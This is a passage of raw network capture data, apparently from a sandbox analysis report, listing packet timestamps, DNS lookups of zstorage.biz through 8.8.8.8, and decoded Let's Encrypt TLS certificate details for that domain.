Nov 21, 2017 22:22:11.833149910 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.833167076 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.833173990 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.833307981 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.857304096 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.865334034 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.865350962 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.865531921 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.865545034 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.872682095 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.872806072 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.872828007 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.887999058 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.888019085 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.888344049 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.888358116 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.941349030 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.941366911 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.941911936 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.941927910 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.956706047 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.956724882 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.956912994 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.956928968 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.970434904 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.970453978 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.970777988 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.970793009 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.972482920 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.972501040 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.972789049 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.972805023 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.033621073 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.033791065 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.033819914 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.048409939 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.048429012 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.048640013 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.048686028 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.050095081 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.050113916 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.050338030 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.050362110 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.065449953 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.065465927 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.065676928 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.065706015 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.112509966 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.112528086 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.112761974 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.112796068 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.129991055 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.130008936 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.130228043 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.130255938 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.134279966 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.134299994 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.134563923 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.134598017 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.134654999 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.134665966 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.135061979 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.135088921 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.191050053 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.191070080 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.191317081 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.191343069 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.249722004 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.249741077 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.249748945 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.250025988 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.250052929 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.256207943 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.256226063 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.256474972 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.256505013 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.260678053 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.260936975 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.260970116 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.274593115 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.274610996 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.274863005 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.274895906 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.346271992 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.346306086 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.346700907 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.346733093 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.351874113 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.351892948 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.352137089 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.352173090 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.361648083 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.361666918 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.361926079 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.361959934 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.427692890 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.427711964 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.427983999 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.428014994 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.442996979 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.443253994 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.443286896 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.485044956 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.485064030 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.485245943 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.485279083 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.497618914 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.497637987 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.497807980 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.497837067 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.501461983 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.501481056 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.501652002 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.501681089 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.516783953 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.516802073 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.516999960 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.517035007 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.640253067 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.640273094 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.640280008 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.640367985 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.640388966 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.653944016 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.653961897 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.654356956 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.654375076 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.655633926 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.655653000 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.655755043 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.655774117 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.740039110 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.740057945 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.740099907 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.740117073 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.740514040 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.755306005 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.761599064 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.761617899 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.761873960 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.761893034 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.765922070 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.765942097 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.766052961 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.766073942 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.766213894 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.766227961 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.766427994 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.766443968 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.827272892 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.827292919 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.827474117 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.827497959 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.838691950 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.838710070 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.838716984 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.838823080 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.838845968 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.839642048 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.839662075 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.839835882 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.839859009 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.842128992 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.842148066 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.842308044 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.842330933 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.947357893 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.947382927 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.947626114 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.947659016 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.962975979 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.962996006 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.963207006 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.963247061 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.975714922 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.975733042 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.975997925 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.976028919 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.992352962 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.992371082 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:12.992615938 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:12.992650032 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.056639910 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.056659937 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.056715012 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.056883097 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:13.056921959 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.060791969 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.060810089 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.061027050 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:13.061070919 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.076091051 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.076109886 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.076379061 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:13.076411009 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.095607996 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.095626116 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.095860958 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:13.095895052 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.149293900 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.149312973 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.149568081 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:13.149601936 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.164689064 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.164706945 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.164714098 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.164963007 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:13.164997101 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.179965973 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.179982901 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.180247068 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:13.180279016 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.251198053 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.251435995 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:13.251471996 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:13.449713945 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:13.700073004 MEZ49168443192.168.2.2185.82.23.166

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Nov 21, 2017 22:21:26.860404968 MEZ6326653192.168.2.28.8.8.8
Nov 21, 2017 22:21:27.028328896 MEZ53632668.8.8.8192.168.2.2
Nov 21, 2017 22:22:04.026335001 MEZ5111353192.168.2.28.8.8.8
Nov 21, 2017 22:22:04.204513073 MEZ53511138.8.8.8192.168.2.2
Nov 21, 2017 22:22:04.214704037 MEZ6186153192.168.2.28.8.8.8
Nov 21, 2017 22:22:04.353858948 MEZ53618618.8.8.8192.168.2.2
Nov 21, 2017 22:22:04.892246962 MEZ6184353192.168.2.28.8.8.8
Nov 21, 2017 22:22:05.202033043 MEZ53618438.8.8.8192.168.2.2
Nov 21, 2017 22:22:05.213591099 MEZ5999153192.168.2.28.8.8.8
Nov 21, 2017 22:22:05.322488070 MEZ53599918.8.8.8192.168.2.2
Nov 21, 2017 22:22:07.046863079 MEZ5527153192.168.2.28.8.8.8
Nov 21, 2017 22:22:07.417412996 MEZ53552718.8.8.8192.168.2.2
Nov 21, 2017 22:22:07.428297997 MEZ5684253192.168.2.28.8.8.8
Nov 21, 2017 22:22:07.567926884 MEZ53568428.8.8.8192.168.2.2
Nov 21, 2017 22:22:10.226366043 MEZ5344053192.168.2.28.8.8.8
Nov 21, 2017 22:22:10.395776987 MEZ53534408.8.8.8192.168.2.2

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Nov 21, 2017 22:21:26.860404968 MEZ192.168.2.28.8.8.80x2859Standard query (0)zstorage.bizA (IP address)IN (0x0001)
Nov 21, 2017 22:22:10.226366043 MEZ192.168.2.28.8.8.80xd72cStandard query (0)zstorage.bizA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Nov 21, 2017 22:21:27.028328896 MEZ8.8.8.8192.168.2.20x2859No error (0)zstorage.biz185.82.23.166A (IP address)IN (0x0001)
Nov 21, 2017 22:22:10.395776987 MEZ8.8.8.8192.168.2.20xd72cNo error (0)zstorage.biz185.82.23.166A (IP address)IN (0x0001)

HTTPS Packets

TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
Nov 21, 2017 22:22:03.258733988 MEZ44349164185.82.23.166192.168.2.2CN=zstorage.bizCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USThu Oct 26 12:23:36 CEST 2017Wed Jan 24 11:23:36 CET 2018[[ Version: V3 Subject: CN=zstorage.biz Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 23560700598155367255315356602121003432706908288835855806175453142275684183727732665375861115460690686442629520255232730871945167149619588096888963659462152088362214534919479611432975068412248966013428653289800435820351547288949606255968682109922484026520660436163269540296092501689321875992312273456192201077009298817132640269315981044667471396071902116147788500314408855792891315166831693364633710099928935493927017174929650643689955650638558279959550008506883415245120150494950552896989622659621453579338794750003618704914413330474880241269693199713330959838743202638447520620106470949347210404964688977630602115739 public exponent: 65537 Validity: [From: Thu Oct 26 12:23:36 CEST 2017, To: Wed Jan 24 11:23:36 CET 2018] Issuer: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US SerialNumber: [ 038ee404 e483a226 3ec278aa 38ce735a 8fd9]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.int-x3.letsencrypt.org, accessMethod: caIssuers accessLocation: URIName: http://cert.int-x3.letsencrypt.org/]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1A 68 74 74 70 3A 2F 2F 63 70 73 2E 6C 65 74 ..http://cps.let0010: 73 65 6E 63 72 79 70 74 2E 6F 72 67 sencrypt.org], PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.2 qualifier: 0000: 30 81 9E 0C 81 9B 54 68 69 73 20 43 65 72 74 69 0.....This Certi0010: 66 69 63 61 74 65 20 6D 61 79 20 6F 6E 6C 79 20 ficate may only 0020: 62 65 20 72 65 6C 69 65 64 20 75 70 6F 6E 20 62 be relied upon b0030: 79 20 52 65 6C 79 69 6E 67 20 50 61 72 74 69 65 y Relying Partie0040: 73 20 61 6E 64 20 6F 6E 6C 79 20 69 6E 20 61 63 s and only in ac0050: 63 6F 72 64 61 6E 63 65 20 77 69 74 68 20 74 68 cordance with th0060: 65 20 43 65 72 74 69 66 69 63 61 74 65 20 50 6F e Certificate Po0070: 6C 69 63 79 20 66 6F 75 6E 64 20 61 74 20 68 74 licy found at ht0080: 74 70 73 3A 2F 2F 6C 65 74 73 65 6E 63 72 79 70 tps://letsencryp0090: 74 2E 6F 72 67 2F 72 65 70 6F 73 69 74 6F 72 79 t.org/repository00A0: 2F /]] ]][5]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][7]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: zstorage.biz][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E5 E8 D0 AA 71 13 06 D3 EA 3B D0 8C 02 93 73 A7 ....q....;....s.0010: 7E F3 87 9B ....]]] Algorithm: [SHA256withRSA] Signature:0000: 38 71 C9 B8 56 2B F3 B4 47 C2 6B 8A 3D 1E D8 67 8q..V+..G.k.=..g0010: F4 12 90 1F 05 F6 92 94 F7 1C 8E B8 50 C9 2D 88 ............P.-.0020: 78 4F C9 F3 44 C6 5D AB 0C B1 E4 24 31 1C 54 1E xO..D.]....$1.T.0030: FF 4A 63 8A 1C 1C F6 89 10 6C 03 C0 FA E4 84 57 .Jc......l.....W0040: 0A 52 64 93 15 88 F3 36 07 95 D0 D8 01 59 F4 A0 .Rd....6.....Y..0050: 61 4C 45 E7 8B 57 60 31 55 8A CC DF 6F 8F 1D 94 aLE..W`1U...o...0060: B6 18 CF 64 94 F7 F1 BB 1F 0E 87 3B 6B 0F AF 4D ...d.......;k..M0070: D1 AE 34 B6 B3 9B 5D B1 25 0C EE F5 F6 A0 1A F4 ..4...].%.......0080: AA F2 7B 26 BC 9C 35 AF 0D 50 BE E7 AC C6 F6 F6 ...&..5..P......0090: 9D 81 15 C8 ED 2B 6E F1 7E 25 DB 2F 69 A4 4F B3 .....+n..%./i.O.00A0: 4D 29 48 65 B2 57 41 BD B6 9E F9 6D C1 6A 7F 87 M)He.WA....m.j..00B0: EC A0 0A 85 32 28 0B CB EF 89 30 4C 5C 94 76 F7 ....2(....0L\.v.00C0: 10 BD 58 A6 07 CE 5C BE 04 CA 87 41 D5 C4 57 F1 ..X...\....A..W.00D0: 8F 4E 4F 54 08 6A 55 7E 8E 76 E5 28 77 3A D2 01 .NOT.jU..v.(w:..00E0: E1 94 9C ED 7B 42 8D 13 B4 8D BB 23 6C B2 F1 0F .....B.....#l...00F0: 0B CD B3 17 F2 0E 08 D9 4F 94 C4 A7 92 B9 24 B1 ........O.....$.]
Nov 21, 2017 22:22:03.258733988 MEZ44349164185.82.23.166192.168.2.2CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021[[ Version: V3 Subject: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19797248476075437682355852246492227182925025209894527646389863306257272162327717438476096960751529894413137923782807258828237626757946953550223743258656059351948211427799114263948499232121738590221774214131983890556391436336270214266656447169277800971416884432628642288505627878176138101439755752196484972290641499489076846352390454201028735981960275647482014359370041238010607728611828345534572152635280172155598035959878659370929022966413402097129857505568509453268467065766156311136296802046438183697980908977865999500405760226706893415483460747503705792669060406182022181441316967415301631965711690685520847684499 public exponent: 65537 Validity: [From: Thu Mar 17 17:40:46 CET 2016, To: Wed Mar 17 17:40:46 CET 2021] Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co. SerialNumber: [ 0a014142 00000153 85736a0b 85eca708]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://isrg.trustid.ocsp.identrust.com, accessMethod: caIssuers accessLocation: URIName: http://apps.identrust.com/roots/dstrootcax3.p7c]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C4 A7 B1 A4 7B 2C 71 FA DB E1 4B 90 75 FF C4 15 .....,q...K.u...0010: 60 85 89 10 `...]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.identrust.com/DSTROOTCAX3CRL.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 22 68 74 74 70 3A 2F 2F 63 70 73 2E 72 6F 6F ."http://cps.roo0010: 74 2D 78 31 2E 6C 65 74 73 65 6E 63 72 79 70 74 t-x1.letsencrypt0020: 2E 6F 72 67 .org]] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]]] Algorithm: [SHA256withRSA] Signature:0000: DD 33 D7 11 F3 63 58 38 DD 18 15 FB 09 55 BE 76 .3...cX8.....U.v0010: 56 B9 70 48 A5 69 47 27 7B C2 24 08 92 F1 5A 1F V.pH.iG'..$...Z.0020: 4A 12 29 37 24 74 51 1C 62 68 B8 CD 95 70 67 E5 J.)7$tQ.bh...pg.0030: F7 A4 BC 4E 28 51 CD 9B E8 AE 87 9D EA D8 BA 5A ...N(Q.........Z0040: A1 01 9A DC F0 DD 6A 1D 6A D8 3E 57 23 9E A6 1E ......j.j.>W#...0050: 04 62 9A FF D7 05 CA B7 1F 3F C0 0A 48 BC 94 B0 .b.......?..H...0060: B6 65 62 E0 C1 54 E5 A3 2A AD 20 C4 E9 E6 BB DC .eb..T..*. .....0070: C8 F6 B5 C3 32 A3 98 CC 77 A8 E6 79 65 07 2B CB ....2...w..ye.+.0080: 28 FE 3A 16 52 81 CE 52 0C 2E 5F 83 E8 D5 06 33 (.:.R..R.._....30090: FB 77 6C CE 40 EA 32 9E 1F 92 5C 41 C1 74 6C 5B .wl.@.2...\A.tl[00A0: 5D 0A 5F 33 CC 4D 9F AC 38 F0 2F 7B 2C 62 9D D9 